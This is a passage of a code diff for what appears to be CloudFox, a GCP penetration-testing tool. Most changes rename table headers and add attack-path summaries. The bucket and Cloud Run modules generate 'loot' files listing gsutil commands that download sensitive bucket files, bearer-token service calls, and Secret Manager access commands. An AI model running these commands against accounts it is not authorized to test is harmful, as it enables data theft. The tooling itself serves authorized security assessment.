"public-assets", - Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Resource Role", "Resource Principal"}, + Header: []string{"Project", "Name", "Asset Type", "IAM Binding Role", "IAM Binding Principal"}, Body: publicBody, }) } } else { - header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} + header := []string{"Project", "Name", "Asset Type", "Location"} var body [][]string for _, asset := range assets { body = append(body, []string{ - asset.ProjectID, m.GetProjectName(asset.ProjectID), asset.Name, assetservice.ExtractAssetTypeShort(asset.AssetType), @@ -692,11 +688,10 @@ func (m *AssetInventoryModule) buildDependenciesTable(deps []ResourceDependency) return nil } - depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} + depsHeader := []string{"Project", "Source", "Dependency Type", "Target", "Target Type"} var depsBody [][]string for _, d := range deps { depsBody = append(depsBody, []string{ - d.ProjectID, m.GetProjectName(d.ProjectID), m.extractResourceName(d.SourceResource), d.DependencyType, diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index ebbae206..83a4707f 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -622,8 +622,7 @@ func (m *BackupInventoryModule) getResourcesHeader() []string { func (m *BackupInventoryModule) getSnapshotsHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Snapshot", "Source Disk", "Size (GB)", @@ -632,8 +631,8 @@ func (m *BackupInventoryModule) getSnapshotsHeader() []string { "Type", "Auto Created", "Locations", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", "Public", } } @@ -702,7 +701,6 @@ func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot // If no IAM bindings, still show the snapshot if len(s.IAMBindings) == 0 { body = append(body, []string{ - s.ProjectID, m.GetProjectName(s.ProjectID), s.Name, m.extractDiskName(s.SourceDisk), @@ -721,7 +719,6 @@ func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot for _, binding := range s.IAMBindings { for _, member := range binding.Members { body = append(body, []string{ - s.ProjectID, m.GetProjectName(s.ProjectID), s.Name, m.extractDiskName(s.SourceDisk), diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index f8bc82fd..dda9e2d2 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -169,11 +169,11 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg } func (m *BeyondCorpModule) getConnectorsHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Resource Role", "Resource Principal", "Public"} + return []string{"Project", "Name", "Location", "State", "Service Account", "IAM Binding Role", "IAM Binding Principal", "Public"} } func (m *BeyondCorpModule) getConnectionsHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Resource Role", "Resource Principal", "Public"} + return []string{"Project", "Name", "Location", "State", "Endpoint", "Gateway", "IAM Binding Role", "IAM Binding Principal", "Public"} } func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice.AppConnectorInfo) [][]string { @@ -187,7 +187,6 @@ func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice. if len(connector.IAMBindings) == 0 { body = append(body, []string{ m.GetProjectName(connector.ProjectID), - connector.ProjectID, connector.Name, connector.Location, connector.State, @@ -201,7 +200,6 @@ func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice. for _, member := range binding.Members { body = append(body, []string{ m.GetProjectName(connector.ProjectID), - connector.ProjectID, connector.Name, connector.Location, connector.State, @@ -228,7 +226,6 @@ func (m *BeyondCorpModule) connectionsToTableBody(connections []beyondcorpservic if len(conn.IAMBindings) == 0 { body = append(body, []string{ m.GetProjectName(conn.ProjectID), - conn.ProjectID, conn.Name, conn.Location, conn.State, @@ -243,7 +240,6 @@ func (m *BeyondCorpModule) connectionsToTableBody(connections []beyondcorpservic for _, member := range binding.Members { body = append(body, []string{ m.GetProjectName(conn.ProjectID), - conn.ProjectID, conn.Name, conn.Location, conn.State, diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 0023d6e1..d0fbf896 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -243,31 +243,29 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger // getDatasetHeader returns the dataset table header func (m *BigQueryModule) getDatasetHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Dataset ID", "Location", "Public", "Encryption", - "Resource Role", + "IAM Binding Role", "Principal Type", - "Resource Principal", + "IAM Binding Principal", } } // getTableHeader returns the table table header func (m *BigQueryModule) getTableHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Dataset ID", "Table ID", "Type", "Encryption", "Rows", "Public", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -290,7 +288,6 @@ func (m *BigQueryModule) datasetsToTableBody(datasets []BigQueryService.Bigquery role = "READER" } body = append(body, []string{ - dataset.ProjectID, m.GetProjectName(dataset.ProjectID), dataset.DatasetID, dataset.Location, @@ -303,7 +300,6 @@ func (m *BigQueryModule) datasetsToTableBody(datasets []BigQueryService.Bigquery } } else { body = append(body, []string{ - dataset.ProjectID, m.GetProjectName(dataset.ProjectID), dataset.DatasetID, dataset.Location, @@ -329,7 +325,6 @@ func (m *BigQueryModule) tablesToTableBody(tables []BigQueryService.BigqueryTabl if len(table.IAMBindings) == 0 { body = append(body, []string{ - table.ProjectID, m.GetProjectName(table.ProjectID), table.DatasetID, table.TableID, @@ -344,7 +339,6 @@ func (m *BigQueryModule) tablesToTableBody(tables []BigQueryService.BigqueryTabl for _, binding := range table.IAMBindings { for _, member := range binding.Members { body = append(body, []string{ - table.ProjectID, m.GetProjectName(table.ProjectID), table.DatasetID, table.TableID, diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index 14f661fb..7d9541ab 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -191,11 +191,11 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger } func (m *BigtableModule) getInstanceHeader() []string { - return []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Resource Role", "Resource Principal", "Public"} + return []string{"Project", "Instance", "Display Name", "Type", "State", "Clusters", "IAM Binding Role", "IAM Binding Principal", "Public"} } func (m *BigtableModule) getTableHeader() []string { - return []string{"Project Name", "Project ID", "Instance", "Table", "Resource Role", "Resource Principal", "Public"} + return []string{"Project", "Instance", "Table", "IAM Binding Role", "IAM Binding Principal", "Public"} } func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.BigtableInstanceInfo) [][]string { @@ -218,7 +218,6 @@ func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.Bigtab if len(instance.IAMBindings) == 0 { body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.DisplayName, instance.Type, @@ -233,7 +232,6 @@ func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.Bigtab for _, member := range binding.Members { body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.DisplayName, instance.Type, @@ -261,7 +259,6 @@ func (m *BigtableModule) tablesToTableBody(tables []bigtableservice.BigtableTabl if len(table.IAMBindings) == 0 { body = append(body, []string{ m.GetProjectName(table.ProjectID), - table.ProjectID, table.InstanceName, table.Name, "-", @@ -273,7 +270,6 @@ func (m *BigtableModule) tablesToTableBody(tables []bigtableservice.BigtableTabl for _, member := range binding.Members { body = append(body, []string{ m.GetProjectName(table.ProjectID), - table.ProjectID, table.InstanceName, table.Name, binding.Role, diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index ac389fa7..84eae29f 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -269,28 +269,39 @@ func (m *BucketEnumModule) addObjectToLoot(projectID string, obj bucketenumservi if obj.IsPublic { publicMarker = " [PUBLIC]" } + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", obj.BucketName, getObjectDir(obj.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", obj.BucketName, obj.ObjectName, localDir) lootFile.Contents += fmt.Sprintf( "# gs://%s/%s%s\n"+ "# Size: %d bytes, Type: %s\n"+ + "mkdir -p %s\n"+ "%s\n\n", obj.BucketName, obj.ObjectName, publicMarker, obj.Size, obj.ContentType, - obj.DownloadCmd, + localDir, + localCpCmd, ) } } func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservice.SensitiveFileInfo) { + // Build local directory path: bucket/BUCKETNAME/OBJECTPATH/ + localDir := fmt.Sprintf("bucket/%s/%s", file.BucketName, getObjectDir(file.ObjectName)) + localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", file.BucketName, file.ObjectName, localDir) + // All files go to the general commands file if lootFile := m.LootMap[projectID]["bucket-enum-commands"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( "# [%s] %s - gs://%s/%s\n"+ "# Category: %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ "%s\n\n", file.RiskLevel, file.Category, file.BucketName, file.ObjectName, file.Description, file.Size, - file.DownloadCmd, + localDir, + localCpCmd, ) } @@ -300,11 +311,13 @@ func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservic lootFile.Contents += fmt.Sprintf( "# [%s] %s - gs://%s/%s\n"+ "# Category: %s, Size: %d bytes\n"+ + "mkdir -p %s\n"+ "%s\n\n", file.RiskLevel, file.Category, file.BucketName, file.ObjectName, file.Description, file.Size, - file.DownloadCmd, + localDir, + localCpCmd, ) } } @@ -319,15 +332,15 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg } func (m *BucketEnumModule) getFilesHeader() []string { - return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Category", "Size", "Public", "Description"} + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public", "Description"} } func (m *BucketEnumModule) getSensitiveFilesHeader() []string { - return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Category", "Size", "Public"} + return []string{"Project", "Bucket", "Object Name", "Category", "Size", "Public"} } func (m *BucketEnumModule) getAllObjectsHeader() []string { - return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Content Type", "Size", "Public", "Updated"} + return []string{"Project", "Bucket", "Object Name", "Content Type", "Size", "Public", "Updated"} } func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { @@ -338,7 +351,6 @@ func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveF publicStatus = "Yes" } body = append(body, []string{ - file.ProjectID, m.GetProjectName(file.ProjectID), file.BucketName, file.ObjectName, @@ -360,7 +372,6 @@ func (m *BucketEnumModule) sensitiveFilesToTableBody(files []bucketenumservice.S publicStatus = "Yes" } body = append(body, []string{ - file.ProjectID, m.GetProjectName(file.ProjectID), file.BucketName, file.ObjectName, @@ -381,7 +392,6 @@ func (m *BucketEnumModule) allObjectsToTableBody(objects []bucketenumservice.Obj publicStatus = "Yes" } body = append(body, []string{ - obj.ProjectID, m.GetProjectName(obj.ProjectID), obj.BucketName, obj.ObjectName, @@ -541,6 +551,17 @@ func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal. } } +// getObjectDir returns the directory portion of an object path +// e.g., "processReports-pilot-gcp-01/function-source.zip" -> "processReports-pilot-gcp-01/" +// e.g., "file.txt" -> "" +func getObjectDir(objectName string) string { + lastSlash := strings.LastIndex(objectName, "/") + if lastSlash == -1 { + return "" + } + return objectName[:lastSlash+1] +} + func formatFileSize(bytes int64) string { const ( KB = 1024 diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index ad3fc552..7d8c5403 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -47,9 +47,10 @@ type BucketsModule struct { gcpinternal.BaseGCPModule // Module-specific fields - per-project for hierarchical output - ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + mu sync.Mutex } // ------------------------------ @@ -88,6 +89,19 @@ func runGCPBucketsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_BUCKETS_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) @@ -339,17 +353,17 @@ func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Log // getTableHeader returns the buckets table header func (m *BucketsModule) getTableHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Name", "Location", "Public", "Versioning", "Uniform Access", "Encryption", - "Resource Role", + "IAM Binding Role", "Principal Type", - "Resource Principal", + "IAM Binding Principal", + "Principal Attack Paths", } } @@ -358,7 +372,7 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI var body [][]string for _, bucket := range buckets { // Format public access - publicDisplay := "" + publicDisplay := "No" if bucket.IsPublic { publicDisplay = bucket.PublicAccess } @@ -368,8 +382,20 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI for _, binding := range bucket.IAMBindings { for _, member := range binding.Members { memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = m.AttackPathCache.GetAttackSummary(email) + } else { + attackPaths = "run --attack-paths" + } + } + body = append(body, []string{ - bucket.ProjectID, m.GetProjectName(bucket.ProjectID), bucket.Name, bucket.Location, @@ -380,13 +406,13 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI binding.Role, memberType, member, + attackPaths, }) } } } else { // Bucket with no IAM bindings body = append(body, []string{ - bucket.ProjectID, m.GetProjectName(bucket.ProjectID), bucket.Name, bucket.Location, @@ -397,6 +423,7 @@ func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketI "-", "-", "-", + "-", }) } } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index 1f57fb5d..f7874329 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -304,11 +304,11 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log } func (m *CertManagerModule) getCertificatesHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} + return []string{"Project", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} } func (m *CertManagerModule) getCertMapsHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} + return []string{"Project", "Name", "Location", "Entries", "Certificates"} } func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certificate, sslCerts []certmanagerservice.SSLCertificate) [][]string { @@ -330,7 +330,6 @@ func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certific body = append(body, []string{ m.GetProjectName(cert.ProjectID), - cert.ProjectID, cert.Name, cert.Type, strings.Join(cert.Domains, ", "), @@ -358,7 +357,6 @@ func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certific body = append(body, []string{ m.GetProjectName(cert.ProjectID), - cert.ProjectID, cert.Name, cert.Type, strings.Join(cert.Domains, ", "), @@ -378,7 +376,6 @@ func (m *CertManagerModule) certMapsToTableBody(certMaps []certmanagerservice.Ce for _, certMap := range certMaps { body = append(body, []string{ m.GetProjectName(certMap.ProjectID), - certMap.ProjectID, certMap.Name, certMap.Location, fmt.Sprintf("%d", certMap.EntryCount), diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index 2a2591ac..4f32eba3 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -273,11 +273,11 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg } func (m *CloudArmorModule) getPoliciesHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} + return []string{"Project", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} } func (m *CloudArmorModule) getUnprotectedLBsHeader() []string { - return []string{"Project Name", "Project ID", "Backend Service"} + return []string{"Project", "Backend Service"} } func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { @@ -295,7 +295,6 @@ func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.Secu body = append(body, []string{ m.GetProjectName(policy.ProjectID), - policy.ProjectID, policy.Name, policy.Type, fmt.Sprintf("%d", policy.RuleCount), @@ -311,7 +310,6 @@ func (m *CloudArmorModule) unprotectedLBsToTableBody(projectID string, lbs []str for _, lb := range lbs { body = append(body, []string{ m.GetProjectName(projectID), - projectID, lb, }) } diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index a8e038a7..4a54a0f9 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -305,7 +305,7 @@ func (m *CloudBuildModule) getTriggersHeader() []string { "Branch/Tag", "Config File", "Service Account", - "Attack Paths", + "SA Attack Paths", "Disabled", "Privesc Potential", } @@ -347,7 +347,7 @@ func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.Trig } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 97910879..982d0ea9 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -30,15 +30,24 @@ Features: Security Columns: - Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER - Public: Whether allUsers or allAuthenticatedUsers can invoke the service -- ServiceAccount: The identity the service runs as -- VPCAccess: Network connectivity to VPC resources -- Secrets: Count of secret environment variables and volumes +- Service Account: The identity the service runs as +- SA Attack Paths: Privesc/exfil/lateral movement potential (requires --attack-paths) +- VPC Access: Network connectivity to VPC resources +- Env Vars: Count of plain environment variables +- Secret Mgr: Count of env vars referencing Secret Manager (secure storage) +- Hardcoded: Detected secrets in env var VALUES (API keys, passwords, tokens) Attack Surface: - Public services with ALL ingress are internet-accessible - Services with default service account may have excessive permissions - VPC-connected services can access internal resources -- Container images may contain vulnerabilities or secrets`, +- Container images may contain vulnerabilities or secrets +- Hardcoded secrets in env vars are a critical security risk + +TIP: To see service account attack paths (privesc, exfil, lateral movement), +use the global --attack-paths flag: + + cloudfox gcp cloudrun -p PROJECT_ID --attack-paths`, Run: runGCPCloudRunCommand, } @@ -93,6 +102,16 @@ func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { // Get attack path cache from context (populated by all-checks or attack path analysis) m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_CLOUDRUN_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) // Get all resources for stats @@ -157,10 +176,6 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l Name: "cloudrun-commands", Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.LootMap[projectID]["cloudrun-env-vars"] = &internal.LootFile{ - Name: "cloudrun-env-vars", - Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", - } m.LootMap[projectID]["cloudrun-secret-refs"] = &internal.LootFile{ Name: "cloudrun-secret-refs", Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", @@ -208,7 +223,6 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l // ------------------------------ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService.ServiceInfo) { commandsLoot := m.LootMap[projectID]["cloudrun-commands"] - envVarsLoot := m.LootMap[projectID]["cloudrun-env-vars"] secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] if commandsLoot == nil { @@ -229,11 +243,7 @@ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService. "# List revisions:\n"+ "gcloud run revisions list --service=%s --region=%s --project=%s\n"+ "# Invoke the service (if you have run.routes.invoke):\n"+ - "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n"+ - "# Deploy revision (if you have run.services.update):\n"+ - "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n"+ - "# Read container logs (if you have logging.logEntries.list):\n"+ - "gcloud logging read 'resource.type=\"cloud_run_revision\" resource.labels.service_name=\"%s\"' --project=%s --limit=50\n\n", + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n", svc.Name, svc.ProjectID, svc.Region, svc.ContainerImage, svc.ServiceAccount, @@ -243,23 +253,8 @@ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService. svc.Name, svc.Region, svc.ProjectID, svc.Name, svc.Region, svc.ProjectID, svc.URL, - svc.Name, svc.Region, svc.ProjectID, - svc.Name, svc.ProjectID, ) - // Add environment variables to loot - if len(svc.EnvVars) > 0 && envVarsLoot != nil { - envVarsLoot.Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) - for _, env := range svc.EnvVars { - if env.Source == "direct" { - envVarsLoot.Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) - } else { - envVarsLoot.Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) - } - } - envVarsLoot.Contents += "\n" - } - // Add secret references to loot if len(svc.SecretRefs) > 0 && secretRefsLoot != nil { secretRefsLoot.Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) @@ -282,7 +277,6 @@ func (m *CloudRunModule) addServiceToLoot(projectID string, svc CloudRunService. func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobInfo) { commandsLoot := m.LootMap[projectID]["cloudrun-commands"] - envVarsLoot := m.LootMap[projectID]["cloudrun-env-vars"] secretRefsLoot := m.LootMap[projectID]["cloudrun-secret-refs"] if commandsLoot == nil { @@ -299,31 +293,15 @@ func (m *CloudRunModule) addJobToLoot(projectID string, job CloudRunService.JobI "# List executions:\n"+ "gcloud run jobs executions list --job=%s --region=%s --project=%s\n"+ "# Execute the job (if you have run.jobs.run):\n"+ - "gcloud run jobs execute %s --region=%s --project=%s\n"+ - "# Update job image (if you have run.jobs.update):\n"+ - "gcloud run jobs update %s --image=YOUR_IMAGE --region=%s --project=%s\n\n", + "gcloud run jobs execute %s --region=%s --project=%s\n\n", job.Name, job.ProjectID, job.Region, job.ContainerImage, job.ServiceAccount, job.Name, job.Region, job.ProjectID, job.Name, job.Region, job.ProjectID, job.Name, job.Region, job.ProjectID, - job.Name, job.Region, job.ProjectID, ) - // Add environment variables to loot - if len(job.EnvVars) > 0 && envVarsLoot != nil { - envVarsLoot.Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) - for _, env := range job.EnvVars { - if env.Source == "direct" { - envVarsLoot.Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) - } else { - envVarsLoot.Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) - } - } - envVarsLoot.Contents += "\n" - } - // Add secret references to loot if len(job.SecretRefs) > 0 && secretRefsLoot != nil { secretRefsLoot.Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) @@ -459,7 +437,6 @@ func (m *CloudRunModule) writeFlatOutput(ctx context.Context, logger internal.Lo // isCloudRunEmptyLoot checks if a loot file contains only the header func isCloudRunEmptyLoot(contents string) bool { return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || - strings.HasSuffix(contents, "# Generated by CloudFox\n\n") || strings.HasSuffix(contents, "# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n") } @@ -469,9 +446,9 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Services table servicesHeader := []string{ - "Project ID", "Project Name", "Name", "Region", "URL", "Ingress", "Public", - "Invokers", "Service Account", "Attack Paths", "Default SA", "Image", "VPC Access", - "Min/Max", "Env Vars", "Secrets", "Hardcoded", + "Project", "Type", "Name", "Region", "Status", "URL", "Ingress", "Public", + "Service Account", "SA Attack Paths", "Default SA", "Image", "VPC Access", + "Min/Max", "IAM Binding Role", "IAM Binding Principal", } var servicesBody [][]string @@ -484,10 +461,6 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou if svc.UsesDefaultSA { defaultSA = "Yes" } - invokers := "-" - if len(svc.InvokerMembers) > 0 { - invokers = strings.Join(svc.InvokerMembers, ", ") - } vpcAccess := "-" if svc.VPCAccess != "" { vpcAccess = extractName(svc.VPCAccess) @@ -496,22 +469,14 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou } } scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) - envVars := "-" - if svc.EnvVarCount > 0 { - envVars = fmt.Sprintf("%d", svc.EnvVarCount) - } - secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount - secrets := "-" - if secretCount > 0 { - secrets = fmt.Sprintf("%d", secretCount) - } - hardcoded := "No" - if len(svc.HardcodedSecrets) > 0 { - hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) + + status := svc.Status + if status == "" { + status = "-" } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if svc.ServiceAccount != "" { attackPaths = m.AttackPathCache.GetAttackSummary(svc.ServiceAccount) @@ -520,11 +485,25 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou } } - servicesBody = append(servicesBody, []string{ - svc.ProjectID, m.GetProjectName(svc.ProjectID), svc.Name, svc.Region, svc.URL, - formatIngress(svc.IngressSettings), publicStatus, invokers, svc.ServiceAccount, - attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, envVars, secrets, hardcoded, - }) + // If service has IAM bindings, create one row per binding + if len(svc.IAMBindings) > 0 { + for _, binding := range svc.IAMBindings { + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + binding.Role, binding.Member, + }) + } + } else { + // Service has no IAM bindings - single row + servicesBody = append(servicesBody, []string{ + m.GetProjectName(svc.ProjectID), "Service", svc.Name, svc.Region, status, svc.URL, + formatIngress(svc.IngressSettings), publicStatus, svc.ServiceAccount, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, + "-", "-", + }) + } } if len(servicesBody) > 0 { @@ -537,8 +516,9 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Jobs table jobsHeader := []string{ - "Project ID", "Project Name", "Name", "Region", "Service Account", "Attack Paths", "Default SA", - "Image", "Tasks", "Parallelism", "Last Execution", "Env Vars", "Secrets", "Hardcoded", + "Project", "Type", "Name", "Region", "Status", "Service Account", "SA Attack Paths", "Default SA", + "Image", "VPC Access", "Tasks", "Parallelism", "Last Execution", + "IAM Binding Role", "IAM Binding Principal", } var jobsBody [][]string @@ -547,26 +527,26 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou if job.UsesDefaultSA { defaultSA = "Yes" } - envVars := "-" - if job.EnvVarCount > 0 { - envVars = fmt.Sprintf("%d", job.EnvVarCount) - } - secretCount := job.SecretEnvVarCount + job.SecretVolumeCount - secrets := "-" - if secretCount > 0 { - secrets = fmt.Sprintf("%d", secretCount) - } - hardcoded := "No" - if len(job.HardcodedSecrets) > 0 { - hardcoded = 